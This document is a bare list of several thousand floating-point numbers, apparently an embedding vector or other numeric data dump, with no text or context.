-0.041946783661842346, 0.022255385294556618, -0.0035447084810584784, -0.011531519703567028, 0.011236662045121193, -0.0003603599907364696, 0.012262255884706974, 0.021229790523648262, 0.012762232683598995, -0.020204197615385056, 0.004464537836611271, 0.017088957130908966, 0.019242703914642334, -0.0031040236353874207, -0.002230666344985366, 0.008275260217487812, 0.028665345162153244, -0.007454784587025642, 0.02017855830490589, -0.01672999933362007, -0.013704496435821056, -0.010089279152452946, -0.01412755437195301, 0.003503043670207262, 0.005326677579432726, 0.001882926095277071, -0.010582845658063889, -0.007961171679198742, -0.01141614094376564, -0.0023364308290183544, 0.019986258819699287, 0.014242933131754398, -0.019652940332889557, -0.017140235751867294, 0.008127830922603607, 0.0035991931799799204, 0.01389679592102766, -0.01707613654434681, 0.002070417394861579, -0.007454784587025642, -0.02135799080133438, -0.05194632336497307, -0.023832235485315323, -0.021165691316127777, -0.014268573373556137, -0.009961079806089401, 0.0033043348230421543, -0.0036825225688517094, 0.0025287296157330275, -0.0038363616913557053, -0.00018769167945720255, -0.003174533136188984, 0.001405383925884962, -0.013166059739887714, -0.005320267751812935, -0.02111441269516945, -0.021857967600226402, -0.001559223048388958, 0.007788102608174086, -0.01234558504074812, 0.007890662178397179, -0.023024579510092735, 0.013012221083045006, -0.002174579305574298, -0.020242657512426376, 0.0029614020604640245, -0.02417837269604206, -0.016204381361603737, 0.024845009669661522, -0.02026829682290554, 0.028485866263508797, 0.00384277175180614, 0.014473692514002323, 0.02426811307668686, 0.01715305633842945, -0.008332949131727219, 0.018614526838064194, 0.01744791492819786, -0.0310754906386137, 0.0019149758154526353, -0.003595988266170025, -0.008256030268967152, -0.012730183079838753, -0.005201683379709721, 0.0014021790120750666, 0.010916164144873619, 0.0625099390745163, 0.021088771522045135, -0.004611967131495476, -0.012428914196789265, 0.020806733518838882, -0.024498870596289635, -0.004877980332821608, 0.009781600907444954, -0.031178051605820656, -0.011544340290129185, 0.015486465767025948, 0.009050864726305008, 0.006281761918216944, 0.00864062737673521, 0.007576574105769396, 0.0008389036520384252, -0.009236753918230534, -0.01573004387319088, -0.023614296689629555, 0.004233779385685921, 0.017024856060743332, 0.021422090008854866, 0.013883975334465504, 0.00008533260552212596, 0.012666082940995693, 0.015345446765422821, -0.002987041836604476, -0.021524649113416672, -0.016127461567521095, 0.018524788320064545, -0.020575974136590958, -0.00992261990904808, -0.004006225615739822, -0.0015520118176937103, 0.004179294686764479, 0.008800876326858997, 0.01602490246295929, 0.00937777291983366, -0.0014093902427703142, -0.012198155745863914, -0.0042722392827272415, -0.005272192880511284, -0.006768919061869383, -0.02305022068321705, -0.003804311854764819, 0.008275260217487812, -0.009768780320882797, 0.009704681113362312, -0.006826608441770077, 0.008717547170817852, 0.00992261990904808, 0.03881872445344925, 0.009352133609354496, -0.0008925870642997324, 0.0065894401632249355, 0.028485866263508797, 0.004631197080016136, 0.009038045071065426, 0.001608900260180235, -0.012954531237483025, 0.007954761385917664, -0.011057183146476746, 0.008627807721495628, 0.005579871125519276, -0.00786502193659544, -0.008006040938198566, 0.005528591573238373, -0.02469117008149624, -0.024909108877182007, -0.010211068205535412, 0.011076413094997406, -0.010082868859171867, 0.021075952798128128, -0.005451671779155731, 0.014332672581076622, -0.009999539703130722, -0.005483721848577261, 0.0012555511202663183, -0.013012221083045006, -0.006967627909034491, 0.003977380692958832, -0.001081680878996849, -0.022729722782969475, -0.0010368111543357372, -0.006974037736654282, 0.015140327624976635, 0.003765852190554142, -0.0037850819062441587, -0.02602444216609001, -0.01478136982768774, 0.024370672181248665, 0.006352271419018507, -0.004236984066665173, -0.012710953131318092, 0.0011225444031879306, -0.005317062605172396, -0.019614480435848236, -0.005051049403846264, -0.0053555225022137165, 0.022781001403927803, -0.007384275086224079, -0.008102190680801868, -0.011659719049930573, -0.027024395763874054, 0.028793545439839363, -0.007973991334438324, 0.00858293753117323, -0.024370672181248665, 0.03507530689239502, -0.00443569291383028, -0.017178695648908615, 0.03933152183890343, 0.019909339025616646, 0.02137080952525139, -0.00004409352186485194, 0.00858293753117323, 0.003967765718698502, -0.006076643243432045, -0.025280887261033058, -0.012480194680392742, -0.007070187013596296, -0.024114273488521576, 0.015794144943356514, 0.01716587506234646, 0.02076827362179756, 0.007916301488876343, 0.0016169126611202955, 0.0262808408588171, 0.014422412030398846, 0.0072945356369018555, 0.02594752237200737, -0.006429190747439861, -0.024486051872372627, -0.005342702381312847, -0.025793682783842087, 0.00020652092644013464, -0.004172884859144688, 0.022396404296159744, 0.010928983800113201, 0.009018815122544765, -0.00031028216471895576, -0.014242933131754398, -0.01829402893781662, -0.024550151079893112, -0.0002638099540490657, 0.006839428562670946, 0.0022194490302354097, -0.01238404493778944, -0.0009919414296746254, 0.0027819231618195772, 0.033998433500528336, -0.01888374611735344, -0.00016385462367907166, -0.007615033537149429, -0.000050904105592053384, -0.0013869553804397583, 0.025460366159677505, -0.01821710914373398, 0.0008016457431949675, 0.006515725515782833, -0.019499100744724274, -0.007550934329628944, -0.022729722782969475, -0.008057321421802044, -0.00447735795751214, -0.025806503370404243, 0.011967397294938564, -0.019396541640162468, -0.034844547510147095, -0.0023252132814377546, 0.01379423588514328, -0.00469850143417716, 0.00939700286835432, -0.018704267218708992, 0.0009126181830652058, 0.0041760895401239395, 0.015794144943356514, -0.002735450863838196, -0.00018488732166588306, -0.0061695873737335205, 0.009384183213114738, 0.017896611243486404, -0.004301083739846945, 0.01908886432647705, -0.005518976598978043, -0.01564030535519123, -0.0021649643313139677, 0.0019229883328080177, -0.024498870596289635, 0.006993267685174942, 0.010185427963733673, -0.007711183279752731, 0.01064053550362587, 0.007384275086224079, -0.0262808408588171, -0.011461010202765465, -0.005256168078631163, -0.0021505418699234724, -0.019947798922657967, 0.01914014294743538, 0.011358451098203659, 0.010614895261824131, -0.00013230560580268502, -0.005310652777552605, 0.030049897730350494, 0.007518884260207415, 0.009929029271006584, -0.020665714517235756, -0.009723911061882973, -0.0012122838525101542, -0.007345815189182758, 0.011813558638095856, 0.010294397361576557, -0.012736592441797256, -0.010403366759419441, 0.004692091606557369, 0.033665116876363754, -0.00646444596350193, -0.016512060537934303, -0.022639982402324677, 0.007313765585422516, 0.004397233482450247, -0.009512382559478283, -0.007736823055893183, -0.009852110408246517, -0.01507622841745615, -0.002102467231452465, -0.0004162468540016562, -0.006826608441770077, 0.00990338996052742, 0.004269034136086702, 0.013883975334465504, -0.0005340299103409052, 0.007602213881909847, -0.0007079000934027135, -0.025409085676074028, -0.011999446898698807, -0.030126817524433136, -0.007499654311686754, -0.001932603307068348, 0.0027370534371584654, 0.008679087273776531, 0.0009695066255517304, -0.00895471591502428, 0.0067560989409685135, -0.0023540582042187452, 0.021268250420689583, 0.006941987667232752, -0.0007691953214816749, 0.006028568372130394, -0.010166198015213013, -0.009159834124147892, 0.01619156077504158, 0.017691493034362793, 0.021857967600226402, 0.019793959334492683, -0.004894005134701729, 0.006458035670220852, 0.004592737182974815, -0.006397141143679619, -0.026716718450188637, 0.00798681192100048, 0.0019951004069298506, -0.009217523969709873, 0.001866901176981628, -0.0070317271165549755, 0.015871062874794006, 0.0006506110657937825, 0.009518791921436787, 0.012794282287359238, 0.0016337388660758734, -0.009249573573470116, 0.00592921394854784, -0.0019005534704774618, 0.0020175352692604065, -0.018178649246692657, 0.018473507836461067, 0.0016225214349105954, -0.014153193682432175, 0.0002612059179227799, 0.005115149077028036, 0.02930634282529354, 0.0035382984206080437, -0.002333225915208459, 0.00234925071708858, 0.005640765652060509, 0.008018861524760723, 0.02443477138876915, -0.005018999334424734, 0.026511598378419876, 0.00039381199167110026, 0.00012649656855501235, -0.004833110608160496, -0.01065976545214653, 0.000011248730515944771, 0.012582753784954548, -0.0035158635582774878, -0.001828441396355629, -0.010608485899865627, -0.013499378226697445, 0.0005536603857763112, -0.03074217401444912, 0.012723772786557674, -0.008121420629322529, -0.0047626011073589325, -0.0004787439538631588, 0.0047626011073589325, -0.016332581639289856, -0.008211160078644753, 0.026562878862023354, -0.005384367424994707, -0.023704035207629204, 0.005496541503816843, 0.009595711715519428, -0.025037307292222977, 0.009800830855965614, -0.02699875645339489, -0.0002586018817964941, 0.012775052338838577, -0.013294259086251259, 0.008070141077041626, 0.0014678811421617866, -0.022781001403927803, -0.014858289621770382, 0.0048715705052018166, 0.02001189813017845, 0.008300899527966976, 0.015704404562711716, -0.01661461964249611, -0.0011025132844224572, -0.011345631442964077, 0.0011594017269089818, 0.020665714517235756, 0.015947982668876648, 0.005060664378106594, 0.015050588175654411, 0.020845193415880203, 0.0005969276535324752, -0.022088725119829178, 0.027767950668931007, 0.01263403333723545, -0.03435739129781723, 0.012275075539946556, 0.0016617823857814074, 0.004188909661024809, 0.032742079347372055, -0.01652487926185131, 0.0011321593774482608, -0.010441826656460762, 0.02510140836238861, 0.020909292623400688, -0.04353645443916321, 0.006317016668617725, -0.021140052005648613, 0.026767997071146965, -0.020037537440657616, -0.021691307425498962, -0.00014422411913983524, -0.0023732881527394056, -0.0060029285959899426, -0.037536732852458954, 0.01280710194259882, 0.01064053550362587, -0.0077752829529345036, -0.006009338423609734, 0.03474199026823044, -0.015704404562711716, -0.013845516368746758, 0.01036490686237812, 0.004288264084607363, 0.0078842518851161, 0.0032482477836310863, 0.0013693278888240457, -0.010755914263427258, -0.021832328289747238, 0.036229100078344345, -0.003797902027145028, -0.0044324882328510284, -0.011518700048327446, -0.003222608007490635, 0.008364999666810036, 0.003204980632290244, 0.008288079872727394, 0.02602444216609001, 0.03456250950694084, -0.007281715981662273, 0.011480240151286125, 0.01640949957072735, 0.01866580732166767, 0.00013801446766592562, 0.0020239450968801975, 0.003277092706412077, 0.00018979494052473456, 0.0022547037806361914, -0.006390731316059828, -0.004297879058867693, -0.01766585186123848, -0.022652802988886833, -0.02363993600010872, -0.02131953090429306, 0.0070317271165549755, 0.011076413094997406, -0.01039054710417986, -0.013012221083045006, -0.02426811307668686, 0.006890708114951849, -0.0028973023872822523, 0.02351173758506775, -0.027357714250683784, 0.021383630111813545, 0.001878118608146906, 0.027485912665724754, 0.002663338789716363, 0.00868549756705761, -0.022511783987283707, 0.007743232883512974, 0.02194770611822605, 0.014255753718316555, 0.0310754906386137, 0.012018676847219467, -0.0019790753722190857, 0.0022146415431052446, -0.008909845724701881, 0.005265783052891493, -0.006877888459712267, -0.00031068280804902315, -0.006602259818464518, 0.014871109277009964, -0.0059965187683701515, -0.0007119062938727438, -0.0014350300189107656, 0.016306940466165543, -0.010820014402270317, -0.006294581573456526, 0.010627715848386288, -0.0012771846959367394, 0.009717500768601894, 0.02190924622118473, -0.010781554505228996, -0.01461471151560545, 0.011928937397897243, 0.01643514074385166, 0.009967489168047905, -0.018652986735105515, 0.00617279252037406, -0.006416371092200279, -0.00099835149012506, 0.005285013001412153, -0.007217616308480501, 0.018909385427832603, -0.0034613790921866894, 0.04143399000167847, 0.009384183213114738, -0.000022885564249008894, -0.029511461034417152, -0.009525202214717865, -0.029178142547607422, -0.01303786039352417, -0.013948075473308563, 0.02910122275352478, 0.000031899573514238, -0.019037583842873573, -0.0167812779545784, -0.0056856353767216206, -0.011050772853195667, 0.02338353730738163, 0.0003188955597579479, -0.027408992871642113, -0.006313811521977186, -0.0016345400363206863, -0.007615033537149429, 0.0034774038940668106, -0.0003821939171757549, 0.010807194747030735, -0.01465317141264677, 0.006134332623332739, -0.002448605140671134, 0.011050772853195667, -0.010954623110592365, 0.016922296956181526, -0.004861955530941486, -0.00739068491384387, 0.0033299748320132494, -0.00910214427858591, 0.026947475969791412, 0.006935577839612961, -0.018101729452610016, -0.006310606840997934, 0.0031424835324287415, 0.012082776986062527, 0.0033588195219635963, 0.011518700048327446, -0.012819922529160976, 0.022986119613051414, -0.007794512901455164, 0.013730136677622795, 0.00041464436799287796, -0.014960848726332188, 0.007852202281355858, -0.019960619509220123, 0.0023316233418881893, -0.006031773518770933, -0.013717317022383213, 0.003804311854764819, 0.016255661845207214, -0.00518245343118906, 0.006442010868340731, -0.009775190614163876, -0.03461378812789917, -0.0038331567775458097, -0.008544478565454483, 0.01185842789709568, 0.002930954797193408, 0.001630533835850656, -0.01766585186123848, -0.015947982668876648, 0.02401171438395977, 0.0030303089879453182, -0.008903436362743378, 0.010845653712749481, -0.010948213748633862, -0.0002445800637360662, 0.016217201948165894, 0.01431985292583704, 0.010646945796906948, 0.007890662178397179, -0.0039485362358391285, 0.013742956332862377, -0.013883975334465504, -0.02843458764255047, 0.013345538638532162, -0.03620345890522003, -0.007531704381108284, 0.0006850645877420902, -0.0012210975401103497, 0.003871616441756487, 0.002403735416010022, 0.014345493167638779, -0.004140834789723158, -0.004320313688367605, 0.010954623110592365, 0.033075399696826935, -0.024165553972125053, 0.004833110608160496, -0.005015794653445482, 0.027691032737493515, -0.01057643536478281, -0.006118307821452618, -0.00567602040246129, -0.0015151544939726591, 0.0018364537972956896, 0.0009358543320558965, -0.0138326957821846, 0.0016697949031367898, 0.011800738051533699, 0.012037906795740128, 0.0248065497726202, -0.04199806600809097, 0.018909385427832603, 0.00223867897875607, -0.01259557344019413, 0.01884528622031212, 0.02266562171280384, -0.01089052390307188, -0.006807378493249416, -0.0000664031904307194, 0.0002079231053357944, -0.0028796750120818615, -0.011986627243459225, -0.005179248750209808, -0.010044408962130547, 0.006775328889489174, -0.008294489234685898, 0.03002425841987133, -0.01855042763054371, -0.0034229191951453686, -0.006086258217692375, -0.03822900727391243, 0.002908519934862852, -0.0005909182946197689, 0.008948305621743202, 0.02535780519247055, -0.011326401494443417, 0.0025559719651937485, 0.008845746517181396, -0.023575836792588234, 0.02943454124033451, -0.0071342866867780685, 0.00025119035854004323, -0.03330615907907486, 0.006188817322254181, 0.02161438949406147, -0.010371317155659199, -0.008461148478090763, -0.0333830788731575, -0.006268941797316074, -0.021075952798128128, -0.014422412030398846, -0.00590998400002718, 0.008384228684008121, -0.007743232883512974, 0.004406848456710577, -0.006659949664026499, -0.0008493198547512293, 0.010531566105782986, 0.011634079739451408, 0.02363993600010872, -0.01888374611735344, -0.009082915261387825, -0.008345769718289375, 0.0248065497726202, -0.0067560989409685135, 0.0240629930049181, 0.0010977057972922921, 0.016165921464562416, -0.0018749135779216886, -0.013307078741490841, -0.01217251643538475, 0.01206995639950037, 0.0068586585111916065, -0.0173325352370739, -0.023665577173233032, 0.025921883061528206, -0.001284395926631987, 0.0061086928471922874, 0.023704035207629204, -0.020127277821302414, 0.00049917574506253, -0.021396450698375702, 0.0129096619784832, 0.0018524787155911326, -0.012499423697590828, -0.007980401627719402, 0.006560595240443945, -0.00543564697727561, -0.017729952931404114, -0.010339267551898956, -0.03876744583249092, 0.007454784587025642, 0.01858888752758503, 0.012544293887913227, -0.0011049170279875398, 0.021550288423895836, -0.010082868859171867, -0.003470993833616376, -0.021922066807746887, -0.01921706274151802, -0.016845377162098885, -0.007211206015199423, -0.0030719737987965345, 0.01661461964249611, 0.018717085942626, -0.006025363225489855, -0.020088817924261093, 0.01744791492819786, -0.009364953264594078, -0.029639659449458122, -0.03604961931705475, -0.0005941232666373253, 0.015089048072695732, -0.02242204360663891, 0.011275121942162514, 0.001372532919049263, -0.0021601568441838026, 0.03120369091629982, 0.014524972066283226, 0.0011121282586827874, 0.008749596774578094, 0.0058394744992256165, -0.024780910462141037, -0.01106359250843525, -0.009871340356767178, 0.013999355025589466, -0.014217293821275234, 0.01511468831449747, -0.0001888935366878286, -0.0018524787155911326, 0.022306663915514946, -0.01431985292583704, -0.01837094873189926, -0.011089232750236988, 0.01112128235399723, 0.0074035050347447395, 0.03828028589487076, -0.003679317655041814, -0.001592074055224657, -0.008679087273776531, -0.004220959264785051, 0.0143839530646801, -0.010339267551898956, -0.022691262885928154, 0.0019774730317294598, -0.020447775721549988, -0.006329836789518595, 0.007384275086224079, 0.004624786786735058, -0.018947845324873924, 0.0070253172889351845, -0.018409408628940582, 0.015024948865175247, 0.001181035302579403, -0.022857921198010445, -0.012794282287359238, -0.015409545972943306, 0.002636096440255642, 0.0009158232132904232, -0.004108785185962915, 0.00590998400002718, -0.01108282245695591, 0.00029405695386230946, -0.0335625559091568, 0.01261480338871479, -0.0011185382027179003, 0.003733802353963256, -0.008185519836843014, -0.00494208000600338, -0.011108462698757648, -0.008525248616933823, -0.011909707449376583, -0.014973669312894344, -0.013319899328052998, -0.023486098274588585, 0.0007475616876035929, -0.008499608375132084, 0.007935531437397003, -0.0018460687715560198, 0.012832742184400558, -0.0006261730450205505, 0.00596126401796937, 0.005637560971081257, 0.034383032470941544, 0.02443477138876915, 0.0355881042778492, -0.0067496891133487225, 0.0026200716383755207, -0.018268389627337456, -0.00040643158718012273, 0.018114550039172173, -0.016601799055933952, 0.010159788653254509, 0.00028243890847079456, 0.0062657371163368225, 0.0010368111543357372, 0.0026232765521854162, 0.004240189213305712, -0.002894097473472357, -0.014230113476514816, -0.017345353960990906, 0.004285058937966824, 0.003128061071038246, -0.007217616308480501, 0.0015063408063724637, 0.0024902699515223503, -0.001476694829761982, 0.0014061852125450969, -0.018242748454213142, 0.0021216971799731255, -0.0013308682246133685, 0.032408762723207474, -0.0009198294137604535, 0.018011990934610367, -0.014050634577870369, 0.026357760652899742, 0.02089647389948368, 0.0004519022477325052, -0.0033812543842941523, -0.004006225615739822, 0.004746576305478811, 0.010287987068295479, -0.012326355092227459, 0.010473876260221004, -0.04263906180858612, -0.013448098674416542, -0.0033940745051950216, 0.02098621241748333, 0.014409592375159264, 0.0056792255491018295, -0.02128107100725174, -0.005028614308685064, -0.010070049203932285, -0.03453687205910683, 0.006284967064857483, -0.001410992699675262, 0.014473692514002323, -0.000571287760976702, -0.007262486033141613, 0.0020447776187211275, -0.009358542971313, -0.020999033004045486, 0.018319668248295784, 0.03948536142706871, -0.0172427948564291, -0.004140834789723158, 0.006986857391893864, 0.0054100072011351585, 0.0006209649727679789, -0.02371685579419136, 0.00866626761853695, -0.013108370825648308, -0.01997343823313713, -0.005986903794109821, 0.005554231349378824, 0.011698178946971893, 0.0006926764035597444, 0.0006217662012204528, -0.008909845724701881, 0.010146968066692352, 0.014819829724729061, 0.009223934262990952, -0.007108646910637617, 0.019191423431038857, 0.003618423128500581, 0.009961079806089401, 0.016499239951372147, -0.0021649643313139677, -0.016460780054330826, 0.01849914714694023, 0.00222906400449574, 0.011525110341608524, -0.002262716181576252, -0.01640949957072735, 0.025768043473362923, 0.011544340290129185, -0.002607251750305295, 0.014153193682432175, -0.020345216616988182, 0.0301524568349123, -0.019037583842873573, 0.00247104000300169, -0.009121374227106571, -0.01808891072869301, -0.0075701638124883175, -0.018729906529188156, -0.009954669512808323, -0.016204381361603737, -0.007307355757802725, -0.02653723955154419, 0.02249896340072155, -0.010358497500419617, -0.02153746969997883, -0.00028684575227089226, 0.022229744121432304, -0.0030479365959763527, 0.004394028335809708, 0.011441780254244804, -0.0003573553403839469, 0.011813558638095856, 0.035177867859601974, -0.025678304955363274, -0.007525294087827206, -0.010839244350790977, -0.018345309421420097, 0.021473370492458344, -0.009332903660833836, 0.005413212347775698, -0.01133281085640192, 0.0007171144243329763, 0.0016617823857814074, -0.018819645047187805, -0.0006718440563417971, -0.006640719715505838, -0.004079940263181925, -0.00029165323940105736, 0.002365275751799345, -0.0006790552288293839, 0.021601568907499313, 0.005320267751812935, -0.01672999933362007, 0.013960895128548145, -0.016704358160495758, 0.009230343624949455, -0.00819834042340517, -0.021306710317730904, 0.0011097245151177049, 0.0065413652919232845, 0.016460780054330826, -0.01560184545814991, 0.02257588319480419, 0.00034473571577109396, -0.003487018868327141, 0.00309601123444736, 0.006890708114951849, -0.025075767189264297, -0.01938372291624546, -0.022639982402324677, -0.002754680812358856, 0.003903666278347373, -0.00418570451438427, -0.000014322256902232766, -0.025178326293826103, -0.012550704181194305, 0.013730136677622795, 0.03351127728819847, -0.004063915461301804, -0.0002956594689749181, -0.021755408495664597, 0.00868549756705761, -0.015396726317703724, -0.0000012175170240880107, 0.0002770305145531893, -0.011941757053136826, -0.0017146646277979016, -0.006743279285728931, -0.008999585174024105, 0.011967397294938564, -0.005589486099779606, -0.013576298020780087, 0.002672953763976693, 0.027101315557956696, -0.02443477138876915, 0.0023925178684294224, 0.008256030268967152, 0.012146876193583012, 0.02561420388519764, -0.012467374093830585, 0.008025270886719227, -0.004551072139292955, 0.02804999053478241, -0.010916164144873619, -0.0074035050347447395, 0.004535047337412834, 0.004804265685379505, 0.0007703971932642162, -0.006089462898671627, 0.019370902329683304, 0.014037814922630787, -0.009781600907444954, 0.005736915394663811, 0.001971062971279025, -0.0008252824773080647, 0.003150495933368802, -0.019152963533997536, 0.004910030402243137, 0.0064323958940804005, -0.0003573553403839469, -0.016999216750264168, -0.0021553493570536375, 0.007480424363166094, -0.024627070873975754, -0.007454784587025642, -0.013294259086251259, -0.003403689246624708, 0.005022204481065273, 0.01858888752758503, -0.00739068491384387, -0.017345353960990906, -0.013448098674416542, 0.03174212574958801, 0.006538160145282745, -0.007743232883512974, -0.005775374826043844, 0.009781600907444954, -0.011602029204368591, -0.0079291220754385, -0.0015688380226492882, -0.006009338423609734, 0.0021104796323925257, -0.002639301586896181, -0.00521450350061059, 0.015448005869984627, -0.011345631442964077, -0.013819876126945019, -0.01065976545214653, 0.010089279152452946, 0.002169771818444133, -0.008909845724701881, 0.016806917265057564, 0.0037241873797029257, 0.009576481766998768, 0.008845746517181396, -0.0014342288486659527, -0.008422688581049442, -0.014255753718316555, 0.006419576238840818, 0.009416232816874981, 0.001591272884979844, 0.008614988066256046, -0.009249573573470116, 0.0037370072677731514, 0.008191930130124092, 0.0063202218152582645, 0.015922343358397484, -0.010044408962130547, -0.0007006888627074659, -0.009255983866751194, 0.008948305621743202, -0.016012081876397133, 0.011871247552335262, -0.013819876126945019, -0.006166382692754269, 0.0013420856557786465, 0.003349204547703266, -0.014255753718316555, 0.014499331824481487, 0.0037786720786243677, 0.004861955530941486, -0.023370718583464622, -0.014204474166035652, 0.006999677512794733, -0.019755499437451363, -0.0012066751951351762, -0.00912778452038765, -0.012313535436987877, -0.013550657778978348, -0.012730183079838753, -0.005470901727676392, -0.024627070873975754, 0.004140834789723158, -0.006429190747439861, 0.010531566105782986, 0.02199898660182953, 0.01787097193300724, 0.025844963267445564, 0.014678810723125935, 0.005903574172407389, -0.0031537008471786976, -0.0042786491103470325, 0.0172427948564291, -0.016627438366413116, -0.014166014268994331, 0.004192114342004061, -0.015294167213141918, 0.009454692713916302, 0.00233963574282825, 0.002179386792704463, -0.02014009840786457, 0.013082730583846569, -0.026819277554750443, 0.01896066404879093, -0.0008120619459077716, 0.004877980332821608, 0.0015127508668228984, -0.0014045827556401491, 0.017255615442991257, -0.012127646245062351, 0.002213038969784975, 0.004220959264785051, 0.011871247552335262, -0.036690618842840195, 0.024588610976934433, 0.007909892126917839, 0.009313673712313175, -0.02288356050848961, 0.005073484033346176, 0.030178096145391464, 0.0015472043305635452, -0.011537929996848106, -0.011800738051533699, -0.010755914263427258, -0.008743186481297016, -0.007852202281355858, -0.009679040871560574, -0.013396818190813065, -0.015281347557902336, 0.004804265685379505, 0.007961171679198742, 0.0004987751017324626, -0.02262716181576252, 0.0036088081542402506, 0.0006478066788986325, -0.009038045071065426, -0.025793682783842087, 0.01379423588514328, -0.020217016339302063, -0.009550842456519604, -0.0033748445566743612, 0.007518884260207415, 0.012512244284152985, 0.0012307125143706799, -0.020870832726359367, -0.017717132344841957, 0.009916209615767002, -0.02371685579419136, 0.011999446898698807, 0.006166382692754269, -0.0017595343524590135, 0.006329836789518595, -0.009890570305287838, 0.0019149758154526353, 0.014345493167638779, 0.035254787653684616, -0.025075767189264297, -0.007147106807678938, 0.0065958499908447266, -0.014576251618564129, 0.011236662045121193, 0.021140052005648613, -0.007371455430984497, -0.009159834124147892, 0.0070189074613153934, -0.005179248750209808, -0.0030495389364659786, -0.014832650311291218, 0.008794466964900494, 0.006297786720097065, 0.022550243884325027, -0.0036472678184509277, 0.0021938092540949583, 0.00064540293533355, 0.011935347691178322, 0.004006225615739822, -0.005977288819849491, 0.02552446536719799, -0.0006113500567153096, 0.013486558571457863, -0.027357714250683784, -0.010166198015213013, 0.01610182225704193, 0.025832142680883408, -0.005147198680788279, 0.0015520118176937103, -0.0033235647715628147, -0.00422736955806613, -0.013191699981689453, -0.016755638644099236, -0.02443477138876915, 0.020883653312921524, -0.014742910861968994, 0.005730505101382732, 0.003355614608153701, -0.012627623043954372, -0.0007010895060375333, -0.007416325155645609, -0.01661461964249611, -0.008506018668413162, -0.00763426348567009, -0.010339267551898956, 0.004147244617342949, -0.0005953251384198666, 0.005333087407052517, -0.003810721915215254, 0.01556338556110859, -0.02506294846534729, 0.0020047153811901808, -0.0073009454645216465, 0.01838376745581627, 0.002831600373610854, -0.009563662111759186, -0.03363947570323944, 0.016576159745454788, -0.023473277688026428, -0.01087129395455122, -0.022216925397515297, -0.0017066521104425192, 0.011127692647278309, -0.005176043603569269, -0.011428960599005222, 0.00570807047188282, 0.017678672447800636, -0.003009476698935032, -0.015358266420662403, -0.014935209415853024, -0.009288033470511436, -0.007935531437397003, 0.020704174414277077, -0.01428139302879572, -0.014076274819672108, -0.01042900700122118, -0.002878072438761592, -0.012448144145309925, -0.02594752237200737, -0.008166290819644928, -0.00957007147371769, -0.023601476103067398, -0.00689711794257164, -0.01389679592102766, -0.011005903594195843, -0.01087129395455122, -0.03456250950694084, -0.0008389036520384252, -0.0064804707653820515, -0.029203781858086586, -0.0326395221054554, -0.024498870596289635, 0.019524741917848587, 0.018704267218708992, 0.035306066274642944, 0.022716902196407318, 0.028024349361658096, 0.012204566039144993, 0.028921743854880333, 0.0033684344962239265, -0.0032194028608500957, -0.030639613047242165, -0.006175997667014599, -0.0031376760452985764, -0.009204704314470291, -0.002301176078617573, -0.018114550039172173, 0.007820152677595615, -0.0009791215416043997, 0.01408909447491169, 0.01997343823313713, -0.02048623561859131, -0.006554185412824154, -0.01190329808741808, -0.00003052243118872866, 0.031639568507671356, 0.0026328915264457464, 0.023793775588274002, 0.02144772931933403, 0.0025463569909334183, -0.012730183079838753, -0.032229285687208176, 0.023434817790985107, 0.008018861524760723, -0.00047794272541068494, 0.0008661460014991462, -0.004602352157235146, 0.010300807654857635, 0.023742495104670525, -0.01230071485042572, 0.03545990586280823, -0.008294489234685898, -0.018870925530791283, 0.01728125475347042, -0.007820152677595615, -0.008563707582652569, 0.007980401627719402, -0.015524925664067268, 0.0016113040037453175, 0.019114503636956215, -0.0032947200816124678, 0.0036472678184509277, -0.0016858198214322329, -0.00396456103771925, 0.002092852257192135, 0.018640166148543358, -0.009980309754610062, -0.016037723049521446, -0.0252680666744709, -0.007973991334438324, -0.003134470898658037, -0.008826516568660736, 0.015230067074298859, -0.002230666344985366, -0.007544524036347866, -0.014063454233109951, 0.0002640102757140994, 0.006281761918216944, -0.006967627909034491, -0.003123253583908081, -0.005653585772961378, 0.021229790523648262, -0.025370625779032707, -0.0049773347564041615, 0.014935209415853024, 0.014960848726332188, 0.026357760652899742, -0.020460596308112144, 0.002448605140671134, -0.013486558571457863, -0.0065958499908447266, 0.0012451349757611752, 0.0010191837791353464, -0.004672861658036709, -0.02930634282529354, 0.007115056738257408, 0.005179248750209808, 0.015460826456546783, -0.011749458499252796, 0.0017338944599032402, -0.005788194946944714, 0.02292202040553093, 0.011249481700360775, 0.016999216750264168, 0.0182555690407753, 0.01015337835997343, -0.0028844824992120266, -0.006105487700551748, 0.021088771522045135, 0.015704404562711716, -0.014063454233109951, 0.009454692713916302, 0.014255753718316555, 0.019204244017601013, -0.0034613790921866894, 0.0032418377231806517, -0.0009863327722996473, 0.010813604108989239, 0.022255385294556618, -0.00939700286835432, -0.023396357893943787, -0.014960848726332188, 0.02148618921637535, 0.004349158611148596, -0.011268711648881435, 0.0019229883328080177, 0.01737099513411522, 0.006349066272377968, -0.00023436419724021107, -0.014755730517208576, -0.008076551370322704, -0.012480194680392742, -0.004089555237442255, -0.008711136877536774, 0.0013492967700585723, 0.020960573107004166, -0.007980401627719402, 0.00765349343419075, 0.01639668084681034, 0.029460180550813675, 0.015499286353588104, -0.017601752653717995, 0.014050634577870369, 0.009018815122544765, -0.012268665246665478, -0.02128107100725174, 0.01564030535519123, -0.01573004387319088, 0.0064804707653820515, -0.002398927928879857, 0.006089462898671627, 0.007076596841216087, 0.018704267218708992, -0.004365183413028717, 0.009345723316073418, 0.00933931302279234, 0.002288356190547347, 0.03194724768400192, 0.007621443830430508, 0.002958197146654129, -0.0138326957821846, 0.0009999539470300078, 0.0014967259485274553, -0.025306526571512222, -0.0066535393707454205, 0.014986488968133926, 0.006788149010390043, 0.011582799255847931, 0.034716349095106125, -0.009435462765395641, -0.022986119613051414, 0.02262716181576252, 0.014832650311291218, -0.00019720646378118545, -0.008884206414222717, 0.039177682250738144, -0.003355614608153701, 0.010037998668849468, 0.023447638377547264, 0.005874729249626398, -0.00811501033604145, 0.010563615709543228, 0.007518884260207415, 0.008993175812065601, 0.003871616441756487, -0.027819231152534485, 0.009954669512808323, 0.006922758184373379, 0.009717500768601894, -0.005528591573238373, -0.01181996800005436, -0.0027098110876977444, -0.024165553972125053, 0.024191193282604218, 0.015627484768629074, -0.00494208000600338, -0.007070187013596296, -0.003788287052884698, 0.007461194880306721, -0.009659810923039913, -0.00744196493178606, 0.03112677112221718, -0.01908886432647705, -0.020345216616988182, -0.013909615576267242, 0.0108328340575099, 0.0012539486633613706, 0.013460918329656124, -0.011678948998451233, -0.004589532036334276, 0.010653355158865452, -0.0033812543842941523, -0.009063685312867165, -0.023396357893943787, -0.010416186414659023, -0.014563431963324547, -0.0076791332103312016, -0.013986535370349884, 0.0019293982768431306, -0.004339543636888266, -0.013768596574664116, -0.017627393826842308, 0.012518653646111488, -0.011781508103013039, 